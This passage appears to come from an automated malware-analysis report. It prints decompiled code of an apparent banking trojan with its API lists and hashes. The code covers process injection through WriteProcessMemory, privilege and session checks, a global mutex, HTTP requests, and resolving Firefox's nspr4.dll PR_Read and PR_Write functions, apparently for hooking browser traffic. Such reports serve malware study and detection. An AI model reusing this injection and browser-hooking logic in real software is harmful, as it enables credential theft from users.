    				signed char _v32;
    				intOrPtr _v68;
    				struct tagWINDOWINFO _v92;
    				void* __ebx;
    				void* __esi;
    				intOrPtr _t107;
    				struct HWND__* _t108;
    				int _t113;
    				int _t114;
    				signed char _t143;
    				struct HWND__* _t144;
    				long _t147;
    				struct HWND__* _t170;
    				long _t171;
    				void* _t174;
    
    				_t174 = __eax;
    				_t107 =  *((intOrPtr*)(__eax + 0x10));
    				_v16 = 0;
    				if( *((intOrPtr*)(_t107 + 0x110)) == 0) {
    					_t108 =  *((intOrPtr*)(_t107 + 0x108));
    					_v16 = _t108;
    					if(_t108 != 0) {
    						_v32 = E0040BB61(0, __eax, 0) & 0x0000ffff;
    					} else {
    						_v32 = 0;
    					}
    				} else {
    					if((_a4 & 0x00000001) != 0) {
    						E00419C89(_a12, _a8, __eax);
    						_a4 = _a4 & 0xfffffffe;
    					}
    					if((_a4 & 0x00000004) != 0) {
    						E00419C1A(0, _t174, 0, 0, 1);
    					}
    				}
    				_t143 = _a4;
    				 *( *(_t174 + 0x10) + 0x100) = _a8;
    				_t113 =  *(_t174 + 0x10);
    				 *(_t113 + 0x104) = _a12;
    				if(_t143 == 0) {
    					L69:
    					return _t113;
    				}
    				_v20 = _t143;
    				_t26 =  &_v20;
    				 *_t26 = _v20 & 0x00000002;
    				if( *_t26 == 0) {
    					if((_t143 & 0x00000004) == 0) {
    						goto L14;
    					} else {
    						_push(0);
    						goto L13;
    					}
    				} else {
    					_push(1);
    					L13:
    					E0040BB61(1, _t174);
    					L14:
    					_v24 = _t143;
    					_t31 =  &_v24;
    					 *_t31 = _v24 & 0x00000020;
    					if( *_t31 == 0) {
    						if((_t143 & 0x00000040) == 0) {
    							L19:
    							_v28 = _t143;
    							_t36 =  &_v28;
    							 *_t36 = _v28 & 0x00000008;
    							if( *_t36 == 0) {
    								if((_t143 & 0x00000010) == 0) {
    									L24:
    									_t114 =  *(_t174 + 0x10);
    									_push( *((intOrPtr*)(_t114 + 0x104)));
    									_push( *((intOrPtr*)(_t114 + 0x100)));
    									0xc00000 = 0x64;
    									_t170 = E0041643E(0xc00000,  &_v12);
    									_t113 = _v12 + 0xfffffff6;
    									_v8 = _t170;
    									if(_t113 <= 7) {
    										_t113 = GetWindowLongW(_t170, 0xfffffff0);
    										if((_t113 & 0x40000000) != 0 && (_t113 & 0x00c00000) != 0xc00000 && (_t113 & 0x80040000) == 0) {
    											_t113 = GetParent(_t170);
    											if(_t113 != 0) {
    												_v8 = _t113;
    												_t170 = _t113;
    											}
    										}
    									}
    									if(_t170 == 0) {
    										L35:
    										_t144 = _v16;
    										if(_t144 != 0) {
    											_t113 = IsWindow(_t144);
    											if(_t113 == 0 || _t170 != 0 && _t144 != _t170 && (_v32 & 0x00000007) == 0) {
    												if(_a4 != 0x8001) {
    													_t113 = E00419C1A(0, _t174, 0, 0, 1);
    												}
    											} else {
    												_v8 = _t144;
    												_v12 = 1;
    												_t170 = _t144;
    											}
    										}
    										goto L43;
    									} else {
    										_t113 = E0040B7B4(_t170);
    										if((_t113 & 0x00000040) == 0) {
    											goto L35;
    										}
    										if(_t170 != _v16) {
    											_t113 = E00419C1A(_t170, _t174, GetWindowThreadProcessId(_t170, 0), 0, 1);
    										}
    										_v12 = 1;
    										L43:
    										if(_t170 == 0) {
    											goto L69;
    										}
    										_v92.cbSize = 0x3c;
    										_t113 = GetWindowInfo(_t170,  &_v92);
    										if(_t113 == 0) {
    											goto L69;
    										}
    										_t113 = _a8 & 0x0000ffff;
    										_t147 = (_a12 & 0x0000ffff) << 0x00000010 | _t113;
    										if(_v12 != 1) {
    											_t171 = _a4;
    										} else {
    											_t113 = E0040B7B4(_t170);
    											if((_t113 & 0x00000020) == 0) {
    												_t113 = _a8 - _v92.rcClient & 0x0000ffff;
    												_t171 = (_a12 - _v68 & 0x0000ffff) << 0x00000010 | _t113;
    											} else {
    												_t171 = _t147;
    											}
    										}
    										if(_v20 == 0) {
    											if((_a4 & 0x00000004) == 0) {
    												goto L55;
    											}
    											_push(_t147);
    											_push(_t171);
    											_push(0xa2);
    											_push(0x202);
    											goto L54;
    										} else {
    											_push(_t147);
    											_push(_t171);
    											_push(0xa1);
    											_push(0x201);
    											L54:
    											_push(_v12);
    											_push( &_v92);
    											_push(_v8);
    											_t113 = E00419E89(_t174, 0xc00000);
    											L55:
    											if(_v24 == 0) {
    												if((_a4 & 0x00000040) == 0) {
    													L60:
    													if(_v28 == 0) {
    														if((_a4 & 0x00000010) == 0) {
    															L65:
    															if((_a4 & 0x00000001) != 0) {
    																_t113 = E00419E89(_t174, 0xc00000, _v8,  &_v92, _v12, 0x200, 0xa0, _t171, _t147);
    															}
    															if((_a4 & 0x00000800) != 0) {
    																_t113 = PostMessageW(_v8, 0x20a, (_a16 & 0x0000ffff) << 0x00000010 | E0040BB61(0, _t174, 0) & 0x0000ffff, _t147);
    															}
    															goto L69;
    														}
    														_push(_t147);
    														_push(_t171);
    														_push(0xa5);
    														_push(0x205);
    														L64:
    														_push(_v12);
    														_push( &_v92);
    														_push(_v8);
    														_t113 = E00419E89(_t174, 0xc00000);
    														goto L65;
    													}
    													_push(_t147);
    													_push(_t171);
    													_push(0xa4);
    													_push(0x204);
    													goto L64;
    												}
    												_push(_t147);
    												_push(_t171);
    												_push(0xa8);
    												_push(0x208);
    												L59:
    												_push(_v12);
    												_push( &_v92);
    												_push(_v8);
    												_t113 = E00419E89(_t174, 0xc00000);
    												goto L60;
    											}
    											_push(_t147);
    											_push(_t171);
    											_push(0xa7);
    											_push(0x207);
    											goto L59;
    										}
    									}
    								}
    								_push(0);
    								L23:
    								E0040BB61(2, _t174);
    								goto L24;
    							}
    							_push(1);
    							goto L23;
    						}
    						_push(0);
    						L18:
    						E0040BB61(4, _t174);
    						goto L19;
    					}
    					_push(1);
    					goto L18;
    				}
    			}

    APIs
    • GetWindowLongW.USER32(00000000,000000F0), ref: 0041A223
    • GetParent.USER32(00000000), ref: 0041A245
    • GetWindowThreadProcessId.USER32(?,00000000), ref: 0041A26A
    • IsWindow.USER32(?), ref: 0041A28D
      • Part of subcall function 00419C89: WaitForSingleObject.KERNEL32(?,000000FF), ref: 00419C9D
      • Part of subcall function 00419C89: ReleaseMutex.KERNEL32(?), ref: 00419CBC
      • Part of subcall function 00419C89: GetWindowRect.USER32 ref: 00419CC9
      • Part of subcall function 00419C89: IsRectEmpty.USER32 ref: 00419D4D
      • Part of subcall function 00419C89: GetWindowLongW.USER32(?,000000F0), ref: 00419D5C
      • Part of subcall function 00419C89: GetParent.USER32(?), ref: 00419D72
      • Part of subcall function 00419C89: MapWindowPoints.USER32 ref: 00419D7B
      • Part of subcall function 00419C89: SetWindowPos.USER32(?,00000000,?,?,?,?,0000630C), ref: 00419D9F
    • GetWindowInfo.USER32 ref: 0041A2DD
    • PostMessageW.USER32(?,0000020A,00000000,00000002), ref: 0041A41A
      • Part of subcall function 00419C1A: WaitForSingleObject.KERNEL32(?,000000FF,745FA660,0041A053,00000000), ref: 00419C20
      • Part of subcall function 00419C1A: ReleaseMutex.KERNEL32(?), ref: 00419C54
      • Part of subcall function 00419C1A: IsWindow.USER32(?), ref: 00419C5B
      • Part of subcall function 00419C1A: PostMessageW.USER32(?,00000215,00000000,?), ref: 00419C75
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.636942963.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000002.636962090.0000000000425000.00000040.00000001.sdmp
    Similarity
    • API ID: Window$LongMessageMutexObjectParentPostRectReleaseSingleWait$EmptyInfoPointsProcessThread
    • String ID: $<$@
    • API String ID: 3705211839-2197183666
    • Opcode ID: aa7d3525540cd6d837ff885726de5086643cfdd6ca5da3331d089c2e17bc709a
    • Instruction ID: 84c5554d5f812be28c63def88804a43fbdd6eb83e7139ac29dc0136ed1327882
    • Opcode Fuzzy Hash: aa7d3525540cd6d837ff885726de5086643cfdd6ca5da3331d089c2e17bc709a
    • Instruction Fuzzy Hash: A891B370601308ABEB218EA9C889BFF7BB5AB41708F14405AF910A63D1C7BD8DD5D75A
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 93%
    			E0041932F(intOrPtr __ecx, void* __edx, void* __eflags) {
    				intOrPtr _v8;
    				intOrPtr _v12;
    				char _v16;
    				void* _v20;
    				void* _v24;
    				intOrPtr _v28;
    				char _v92;
    				void* __ebx;
    				void* __edi;
    				intOrPtr _t22;
    				void* _t25;
    				long _t27;
    				void* _t28;
    				long _t29;
    				void* _t33;
    				void* _t39;
    				void* _t41;
    				void* _t44;
    				long _t49;
    				void* _t50;
    				void* _t57;
    				void* _t62;
    				void* _t69;
    				void* _t73;
    				WCHAR* _t77;
    				void* _t78;
    				void* _t80;
    				void* _t82;
    
    				_t73 = __edx;
    				_t70 = __ecx;
    				_t22 = E0041CA33(__ecx, 0x743c1521, 2);
    				_v28 = _t22;
    				if(_t22 != 0) {
    					SetThreadPriority(GetCurrentThread(), 0xfffffff1);
    					_t25 = E0041CB59();
    					__eflags = _t25;
    					if(_t25 == 0) {
    						L24:
    						E004154D1(_v28);
    						__eflags = 0;
    						return 0;
    					}
    					_t27 = WaitForSingleObject( *0x424024, 0xea60);
    					__eflags = _t27 - 0x102;
    					if(_t27 != 0x102) {
    						goto L24;
    					}
    					do {
    						_t28 = E004116E9(_t70);
    						_v24 = _t28;
    						__eflags = _t28;
    						if(__eflags == 0) {
    							goto L22;
    						}
    						_t80 = E0041787A( &_v16, _t73, __eflags, _t28, 2, 0x20000000);
    						_v20 = _t80;
    						__eflags = _t80;
    						if(__eflags == 0) {
    							L21:
    							E00411CFE(_v20);
    							E00411CFE(_v24);
    							goto L22;
    						}
    						_t70 = _v16;
    						_t33 = E00418DC4(_v16, __eflags, _t80);
    						__eflags = _t33;
    						if(_t33 == 0) {
    							goto L21;
    						} else {
    							goto L8;
    						}
    						do {
    							L8:
    							_v8 = E00412BCE(_t80, 1);
    							_v12 = E00412BCE(_t80, 2);
    							_t39 = E004130AD(_t80, E0041283B(_t80));
    							_t72 = _v8;
    							_t41 = E004130AD(_t72, E0041283B(_v8));
    							_t70 = _v12;
    							_push(E004130AD(_t70, E0041283B(_v12)));
    							_push(_t41);
    							_push(_t39);
    							_push(L"Global\\%08X%08X%08X");
    							_t73 = 0x20;
    							_t77 =  &_v92;
    							_t44 = E004129F1(_t43, _t73, _t77);
    							_t82 = _t82 + 0x10;
    							__eflags = _t44 - 0x1f;
    							if(_t44 != 0x1f) {
    								goto L20;
    							}
    							_t69 = CreateMutexW(0x423b98, 1, _t77);
    							__eflags = _t69;
    							if(_t69 == 0) {
    								goto L20;
    							}
    							_t49 = GetLastError();
    							__eflags = _t49 - 0xb7;
    							if(_t49 == 0xb7) {
    								CloseHandle(_t69);
    								_t69 = 0;
    								__eflags = 0;
    							}
    							__eflags = _t69;
    							if(_t69 != 0) {
    								_t50 = 0x10;
    								_t78 = E00411CCE(_t50);
    								__eflags = _t78;
    								if(_t78 == 0) {
    									L19:
    									E004154D1(_t69);
    									goto L20;
    								}
    								 *_t78 = E0041215C(_t51 | 0xffffffff, _t80);
    								 *(_t78 + 4) = E0041215C(_t53 | 0xffffffff, _v8);
    								_t57 = E0041215C(_t55 | 0xffffffff, _v12);
    								__eflags =  *_t78;
    								 *(_t78 + 8) = _t57;
    								 *(_t78 + 0xc) = _t69;
    								if( *_t78 == 0) {
    									L18:
    									E00411CFE( *_t78);
    									E00411CFE( *(_t78 + 4));
    									E00411CFE( *(_t78 + 8));
    									E00411CFE(_t78);
    									goto L19;
    								}
    								__eflags =  *(_t78 + 4);
    								if( *(_t78 + 4) == 0) {
    									goto L18;
    								}
    								__eflags = _t57;
    								if(_t57 == 0) {
    									goto L18;
    								}
    								_t62 = E00413733(0x80000, E00419084, _t78);
    								__eflags = _t62;
    								if(_t62 != 0) {
    									goto L20;
    								}
    								goto L18;
    							}
    							L20:
    							_t80 = E00412BCE(_t80, 3);
    							__eflags = _t80;
    						} while (_t80 != 0);
    						goto L21;
    						L22:
    						_t29 = WaitForSingleObject( *0x424024, 0xea60);
    						__eflags = _t29 - 0x102;
    					} while (_t29 == 0x102);
    					goto L24;
    				}
    				return _t22 + 1;
    			}

    APIs
      • Part of subcall function 0041CA33: CreateMutexW.KERNEL32(00423B98,00000000,?,?,?,?,?), ref: 0041CA54
    • GetCurrentThread.KERNEL32 ref: 00419350
    • SetThreadPriority.KERNEL32(00000000), ref: 00419357
    • WaitForSingleObject.KERNEL32(0000EA60), ref: 00419375
    • CreateMutexW.KERNEL32(00423B98,00000001,?,20000000), ref: 00419438
    • GetLastError.KERNEL32 ref: 00419448
    • CloseHandle.KERNEL32(00000000), ref: 00419456
    Strings
    Memory Dump Source
    • Source File: 00000001.00000001.636690147.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000001.636784720.0000000000425000.00000040.00020000.sdmp
    Similarity
    • API ID: CreateMutexThread$CloseCurrentErrorHandleLastObjectPrioritySingleWait
    • String ID: Global\%08X%08X%08X
    • API String ID: 3448221409-3239447729
    • Opcode ID: b7bbfbf96a89bc281a88f294ddd5b2ddb05c781484545996120b4d1213df0c7e
    • Instruction ID: 83874d11d37f4ae7f4aa303aa47fbaf2d9867f93473b6131949264faa726d704
    • Opcode Fuzzy Hash: b7bbfbf96a89bc281a88f294ddd5b2ddb05c781484545996120b4d1213df0c7e
    • Instruction Fuzzy Hash: A941E470A00206B7DB217BB18E56BEF7B65AF00704F10062BF911F62A2DB7C8DD1869C
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 62%
    			E00410C19(void* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
    				struct HINSTANCE__* _v8;
    				char _v12;
    				char _v16;
    				_Unknown_base(*)()* _v20;
    				intOrPtr _v24;
    				char _v40;
    				char _v60;
    				char _v84;
    				char _v112;
    				void* __edi;
    				void* __esi;
    				struct HINSTANCE__* _t30;
    				_Unknown_base(*)()* _t42;
    				intOrPtr _t44;
    				intOrPtr _t50;
    				intOrPtr* _t55;
    				void* _t57;
    				void* _t58;
    				intOrPtr* _t59;
    				CHAR* _t61;
    				CHAR* _t62;
    				CHAR* _t63;
    				_Unknown_base(*)()* _t64;
    				WCHAR* _t66;
    				void* _t68;
    
    				_t58 = __ecx;
    				_t66 =  &_v112;
    				E00419897(0xdd, _t66);
    				_t30 = LoadLibraryW(_t66);
    				_v8 = _t30;
    				if(_t30 == 0) {
    					return _t30;
    				}
    				_t61 =  &_v84;
    				E00419861(0xde, _t61);
    				_t55 = GetProcAddress(_v8, _t61);
    				_t62 =  &_v40;
    				E00419861(0xdf, _t62);
    				_v20 = GetProcAddress(_v8, _t62);
    				_t63 =  &_v60;
    				E00419861(0xe0, _t63);
    				_t42 = GetProcAddress(_v8, _t63);
    				_t68 = 0;
    				_t64 = _t42;
    				if(_t55 == 0 || _v20 == 0 || _t64 == 0) {
    					L14:
    					return FreeLibrary(_v8);
    				} else {
    					_t44 = E004133CA(L"SeTcbPrivilege");
    					__imp__WTSGetActiveConsoleSessionId();
    					_v24 = _t44;
    					if(_t44 != 0xffffffff) {
    						E00410BA8(_t58, 0, _t64, _t44, _a4, _a8);
    					}
    					_push( &_v12);
    					_push( &_v16);
    					_push(1);
    					_push(_t68);
    					_push(_t68);
    					if( *_t55() == 0) {
    						goto L14;
    					} else {
    						_t57 = 0;
    						if(_v12 <= _t68) {
    							L13:
    							_v20(_v16);
    							goto L14;
    						} else {
    							goto L8;
    						}
    						do {
    							L8:
    							_t59 = _t68 + _v16;
    							_t50 =  *((intOrPtr*)(_t59 + 8));
    							if(_t50 == 0 || _t50 == 4) {
    								_t51 =  *_t59;
    								if( *_t59 != _v24) {
    									E00410BA8(_t59, _t68, _t64, _t51, _a4, _a8);
    								}
    							}
    							_t57 = _t57 + 1;
    							_t68 = _t68 + 0xc;
    						} while (_t57 < _v12);
    						goto L13;
    					}
    				}
    			}

    APIs
    • LoadLibraryW.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?,?,00411567,?,?), ref: 00410C30
    • GetProcAddress.KERNEL32(?,?), ref: 00410C5C
    • GetProcAddress.KERNEL32(?,?), ref: 00410C73
    • GetProcAddress.KERNEL32(?,?), ref: 00410C8B
    • FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00411567,?,?,00000000), ref: 00410D14
      • Part of subcall function 004133CA: GetCurrentThread.KERNEL32 ref: 004133DA
      • Part of subcall function 004133CA: OpenThreadToken.ADVAPI32(00000000,?,?,?,?,00410CA8,SeTcbPrivilege), ref: 004133E1
      • Part of subcall function 004133CA: OpenProcessToken.ADVAPI32(000000FF,00000020,00410CA8,?,?,?,?,00410CA8,SeTcbPrivilege), ref: 004133F3
    • WTSGetActiveConsoleSessionId.KERNEL32(SeTcbPrivilege,?,?,?,?,?,?,?,?,?,?,?,00411567,?,?,00000000), ref: 00410CA8
      • Part of subcall function 00410BA8: EqualSid.ADVAPI32(00000000,00000000,?,00000000,?,00410D02,00000000,?,?,?), ref: 00410BCD
      • Part of subcall function 00410BA8: CloseHandle.KERNEL32(?,?,00000000,?,00410D02,00000000,?,?,?), ref: 00410C0E
    Strings
    Memory Dump Source
    • Source File: 00000001.00000001.636690147.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000001.636784720.0000000000425000.00000040.00020000.sdmp
    Similarity
    • API ID: AddressProc$LibraryOpenThreadToken$ActiveCloseConsoleCurrentEqualFreeHandleLoadProcessSession
    • String ID: .exe$SeTcbPrivilege
    • API String ID: 1107370034-552748125
    • Opcode ID: 853414da98359fbe984d31aadbd48b1eaee33cd3e46df1b87d0a014fbbd168fe
    • Instruction ID: a429aabe64849827bf616fa2e204ca9c9547a6ccc49a2f099ed329d3475f55bd
    • Opcode Fuzzy Hash: 853414da98359fbe984d31aadbd48b1eaee33cd3e46df1b87d0a014fbbd168fe
    • Instruction Fuzzy Hash: 32316A35A00118ABCB11ABE5EC819EEBB79FB44704F104567F805F6211CBB9AE81DBA4
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E0041C4D2(void* __ecx, void* __edx, void* __eflags) {
    				long _v8;
    				signed int _v12;
    				void _v532;
    				void* __edi;
    				void* __esi;
    				unsigned int _t22;
    				void* _t30;
    				void* _t39;
    				void* _t41;
    				WCHAR* _t42;
    				void* _t43;
    				void* _t46;
    
    				_t41 = __edx;
    				_t39 = __ecx;
    				InitializeCriticalSection(0x422b14);
    				 *0x422b08 = 0;
    				 *0x422b10 = 0;
    				 *0x422b0c = 0;
    				 *0x422b04 = 0;
    				 *0x423a54 = 0;
    				 *0x423a4c = 0;
    				 *0x423a50 = 0;
    				InitializeCriticalSection(0x423a34);
    				_t42 =  &_v532;
    				E0041CD51(_t39, _t42, InitializeCriticalSection, 0);
    				_v12 = _v12 | 0xffffffff;
    				_v8 = 0x1fe;
    				_t43 = CreateFileW(_t42, 0x80000000, 1, 0, 3, 0, 0);
    				if(_t43 != 0xffffffff) {
    					if(ReadFile(_t43,  &_v532, _v8,  &_v8, 0) != 0) {
    						_v12 = _v8;
    					}
    					CloseHandle(_t43);
    				}
    				_t22 = _v12;
    				if(_t22 == 0xffffffff || (_t22 & 0x00000001) != 0) {
    					_t22 = 0;
    				}
    				 *((short*)(_t46 + (_t22 >> 1) * 2 - 0x210)) = 0;
    				E0040E019( &_v532);
    				E0040F268( &_v532);
    				 *0x422bc4 = 0;
    				 *0x422c44 = 0;
    				InitializeCriticalSection(0x422c2c);
    				E0040BC0D(_t41);
    				if(GetModuleHandleW(L"nspr4.dll") == 0) {
    					_t30 = 0;
    				} else {
    					_t30 = E00404F3F(0, _t41, _t29);
    				}
    				if(_t30 != 0) {
    					 *0x422b44 =  *0x422b44 | 0x00000001;
    				}
    				E00404D08();
    				return 1;
    			}

    APIs
    • InitializeCriticalSection.KERNEL32(00422B14,00000000,0001FD30,00000000), ref: 0041C4E9
    • InitializeCriticalSection.KERNEL32(00423A34), ref: 0041C51E
      • Part of subcall function 0041CD51: PathRenameExtensionW.SHLWAPI(?,.dat,?,00423BC0,00000032,00020016,?,00000000), ref: 0041CDCC
    • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000), ref: 0041C546
    • ReadFile.KERNEL32(00000000,?,000001FE,000001FE,00000000), ref: 0041C563
    • CloseHandle.KERNEL32(00000000), ref: 0041C574
    • InitializeCriticalSection.KERNEL32(00422C2C), ref: 0041C5BB
    • GetModuleHandleW.KERNEL32(nspr4.dll), ref: 0041C5C7
    Strings
    Memory Dump Source
    • Source File: 00000001.00000001.636690147.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000001.636784720.0000000000425000.00000040.00020000.sdmp
    Similarity
    • API ID: CriticalInitializeSection$FileHandle$CloseCreateExtensionModulePathReadRename
    • String ID: nspr4.dll
    • API String ID: 1155594396-741017701
    • Opcode ID: 0c3a9a7fea4c581c6b0194d9fb292b751286443763dcb38003b10c3aced20910
    • Instruction ID: 982fd6b60ce602c3c30e9fc7b33cce5870954f9b4528a442642a93ea236803c5
    • Opcode Fuzzy Hash: 0c3a9a7fea4c581c6b0194d9fb292b751286443763dcb38003b10c3aced20910
    • Instruction Fuzzy Hash: 8231B870680218BAC7209F75ADC5ADE7B79AB44314F50057FE415E32E0D7B86E868B5C
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 95%
    			E0041CA6E(void* __ecx, void* __edi, void* __esi, void* __eflags, void* _a4, void _a8) {
    				char _v5;
    				void _v12;
    				void _t26;
    				void _t43;
    				void* _t51;
    				void* _t52;
    
    				_t52 = __esi;
    				_t51 = __edi;
    				_t26 = E00416662( *0x423b74, __edi);
    				_v12 = _t26;
    				if(_t26 != 0) {
    					_v5 = 0;
    					if(DuplicateHandle(0xffffffff, _a4, __edi,  &_a4, 0, 0, 2) == 0) {
    						_v5 = 1;
    					}
    					_a8 = _a8 |  *0x423b60 & 0x00000014;
    					_push(_t52);
    					if(WriteProcessMemory(_t51, 0x423b60 -  *0x423b74 + _v12,  &_a8, 4, 0) == 0) {
    						_v5 = _v5 + 1;
    					}
    					if(WriteProcessMemory(_t51, 0x423b74 -  *0x423b74 + _v12,  &_v12, 4, 0) == 0) {
    						_v5 = _v5 + 1;
    					}
    					if(E0041C24F(0x424024, _t51, _v12,  *0x424024) == 0) {
    						_v5 = _v5 + 1;
    					}
    					if(E0041C24F(0x424028, _t51, _v12,  *0x424028) == 0) {
    						_v5 = _v5 + 1;
    					}
    					if(_v5 == 0) {
    						_t43 = _v12;
    					} else {
    						VirtualFreeEx(_t51, _v12, 0, 0x8000);
    						goto L1;
    					}
    				} else {
    					L1:
    					_t43 = 0;
    				}
    				return _t43;
    			}

    APIs
      • Part of subcall function 00416662: IsBadReadPtr.KERNEL32(?,?,00000000,?,00000000,?,00000000,?,0001FDA6,00000000), ref: 0041667E
    • DuplicateHandle.KERNEL32(000000FF,0001FDA6,00000000,0001FDA6,00000000,00000000,00000002,00000000,00000000,?,?,?,00406420,?,00000000,?), ref: 0041CAA0
    • WriteProcessMemory.KERNEL32(00000000,0001FDA6,?,00000004,00000000,?,?,?,?,00406420,?,00000000,?,?,004065AE,?), ref: 0041CAD7
    • WriteProcessMemory.KERNEL32(00000000,0001FDA6,0001FDA6,00000004,00000000,?,?,?,00406420,?,00000000,?,?,004065AE,?,?), ref: 0041CAF7
    • VirtualFreeEx.KERNEL32(00000000,0001FDA6,00000000,00008000,00000000,0001FDA6,00000000,0001FDA6,?,?,00406420,?,00000000,?,?,004065AE), ref: 0041CB46
    Strings
    Memory Dump Source
    • Source File: 00000001.00000001.636690147.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000001.636784720.0000000000425000.00000040.00020000.sdmp
    Similarity
    • API ID: MemoryProcessWrite$DuplicateFreeHandleReadVirtual
    • String ID: $@B$(@B$`;B$t;B
    • API String ID: 2215616122-1652081232
    • Opcode ID: f4bf2983d3b859990060073e456e0cc5704b466467401160893b1654794f4ce4
    • Instruction ID: 1e28a60be84a6ed4d7c3db0c5e3e6b967f1e7c3883753404dd6c2c16a4d7e05f
    • Opcode Fuzzy Hash: f4bf2983d3b859990060073e456e0cc5704b466467401160893b1654794f4ce4
    • Instruction Fuzzy Hash: EB21D376A44109BBDF11CFA4ED81EEE7FBCEB49349F404095F701E2151D339AA868B28
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 90%
    			E004139E6(void* _a4, long _a8, void* _a12, long _a16, void _a20) {
    				long _t18;
    				char* _t21;
    				signed int _t29;
    				char* _t30;
    				void* _t32;
    
    				_t29 = _a20 & 0x00000002;
    				_t18 = 0x8404f700;
    				if(_t29 != 0) {
    					_t18 = 0x8444f700;
    				}
    				if((_a20 & 0x00000004) != 0) {
    					_t18 = _t18 | 0x00800000;
    				}
    				_t30 = "POST";
    				if((_a20 & 0x00000001) == 0) {
    					_t30 = "GET";
    				}
    				_t32 = HttpOpenRequestA(_a4, _t30, _a8, "HTTP/1.1", 0, 0x422000, _t18, 0);
    				if(_t32 == 0) {
    					L15:
    					return 0;
    				} else {
    					if(_t29 == 0) {
    						_push(0x13);
    						_t21 = "Connection: close\r\n";
    						_pop(0);
    					} else {
    						_t21 = 0;
    					}
    					if(HttpSendRequestA(_t32, _t21, 0, _a12, _a16) == 0) {
    						L14:
    						InternetCloseHandle(_t32);
    						goto L15;
    					} else {
    						_a20 = _a20 & 0x00000000;
    						_a8 = 4;
    						if(HttpQueryInfoA(_t32, 0x20000013,  &_a20,  &_a8, 0) == 0 || _a20 != 0xc8) {
    							goto L14;
    						} else {
    							return _t32;
    						}
    					}
    				}
    			}

    APIs
    • HttpOpenRequestA.WININET(?,POST,?,HTTP/1.1,00000000,00422000,8404F700,00000000), ref: 00413A2E
    • HttpSendRequestA.WININET(00000000,Connection: close,00000013,?,?), ref: 00413A55
    • HttpQueryInfoA.WININET(00000000,20000013,00000000,?,00000000), ref: 00413A7A
    • InternetCloseHandle.WININET(00000000), ref: 00413A92
    Strings
    Memory Dump Source
    • Source File: 00000001.00000001.636690147.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000001.636784720.0000000000425000.00000040.00020000.sdmp
    Similarity
    • API ID: Http$Request$CloseHandleInfoInternetOpenQuerySend
    • String ID: Connection: close$GET$HTTP/1.1$POST
    • API String ID: 3080274660-1621676011
    • Opcode ID: ae44196c6d01a36f030997b89dc24ce9c3e681acfa86aa0eb077aef888ebbeb2
    • Instruction ID: a5d5345edb4993a02f14253f2e9f6523828b0bd5a589c32f1cc82a412600693f
    • Opcode Fuzzy Hash: ae44196c6d01a36f030997b89dc24ce9c3e681acfa86aa0eb077aef888ebbeb2
    • Instruction Fuzzy Hash: 9511843124020A7BEB118F54DC49FEB3E9CAF1479AF14402AFE41A51A0D7B8DB9087EC
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 83%
    			E00404F3F(void* __ecx, void* __edx, struct HINSTANCE__* __edi) {
    				void* __ebx;
    				_Unknown_base(*)()* _t4;
    				void* _t9;
    				void* _t10;
    				void* _t11;
    				void* _t12;
    
    				_t12 = __edx;
    				_t11 = __ecx;
    				 *0x422360 = GetProcAddress(__edi, "PR_OpenTCPSocket");
    				 *0x422370 = GetProcAddress(__edi, "PR_Close");
    				 *0x422380 = GetProcAddress(__edi, "PR_Read");
    				_t4 = GetProcAddress(__edi, "PR_Write");
    				_push(0x422360);
    				_t9 = 4;
    				 *0x422390 = _t4;
    				_t10 = E00404C77(_t9, _t11, _t12);
    				if(_t10 != 0) {
    					E0040F321(__edi,  *0x422368,  *0x422378,  *0x422388,  *0x422398);
    				}
    				return _t10;
    			}

    APIs
    • GetProcAddress.KERNEL32(00000000,PR_OpenTCPSocket), ref: 00404F4D
    • GetProcAddress.KERNEL32(00000000,PR_Close), ref: 00404F5A
    • GetProcAddress.KERNEL32(00000000,PR_Read), ref: 00404F67
    • GetProcAddress.KERNEL32(00000000,PR_Write), ref: 00404F74
      • Part of subcall function 00404C77: VirtualAllocEx.KERNEL32(000000FF,00000000,00000034,00003000,00000040,00000000,00020016,?,?,00404F3D,00422020,00000000,0041C5EC), ref: 00404CAE
      • Part of subcall function 0040F321: InitializeCriticalSection.KERNEL32(00422ADC,0001FD30,00404FAD,00422360), ref: 0040F337
      • Part of subcall function 0040F321: GetProcAddress.KERNEL32(00000000,PR_GetNameForIdentity), ref: 0040F373
      • Part of subcall function 0040F321: GetProcAddress.KERNEL32(PR_SetError), ref: 0040F385
      • Part of subcall function 0040F321: GetProcAddress.KERNEL32(PR_GetError), ref: 0040F397
    Strings
    Memory Dump Source
    • Source File: 00000001.00000001.636690147.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000001.636784720.0000000000425000.00000040.00020000.sdmp
    Similarity
    • API ID: AddressProc$AllocCriticalInitializeSectionVirtual
    • String ID: PR_Close$PR_OpenTCPSocket$PR_Read$PR_Write
    • API String ID: 1833644279-3954199073
    • Opcode ID: 6661ca2bf98ae48bc77b78431093f0cd8a9f11623b32d802b1f230e3566d1af7
    • Instruction ID: c4ed9ba6e8cad945acb82b6205de8cfd504f06e0059ca920e8a215ddb3174949
    • Opcode Fuzzy Hash: 6661ca2bf98ae48bc77b78431093f0cd8a9f11623b32d802b1f230e3566d1af7
    • Instruction Fuzzy Hash: C8F09071B813147BCB209B766D06D563FA8F746B64388043BB904A71B0C7FE0412DA5C
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 78%
